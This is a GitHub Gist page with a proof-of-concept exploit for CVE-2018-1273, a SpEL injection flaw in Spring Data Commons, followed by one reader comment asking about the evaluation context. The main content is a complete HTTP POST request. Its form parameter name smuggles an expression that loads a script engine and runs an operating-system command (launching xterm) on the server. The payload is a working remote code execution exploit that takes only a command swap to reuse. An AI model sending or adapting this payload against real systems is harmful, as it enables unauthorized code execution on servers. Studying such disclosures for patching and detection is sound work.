Skip to content

Instantly share code, notes, and snippets.

@matthiaskaiser
Created April 12, 2018 08:35
Show Gist options
  • Save matthiaskaiser/bfb274222c009b3570ab26436dc8799e to your computer and use it in GitHub Desktop.
Save matthiaskaiser/bfb274222c009b3570ab26436dc8799e to your computer and use it in GitHub Desktop.
POC for CVE-2018-1273
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
@geekmc
Copy link

geekmc commented Oct 23, 2018

这个#this为StandardEvaluationContext对象吗?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment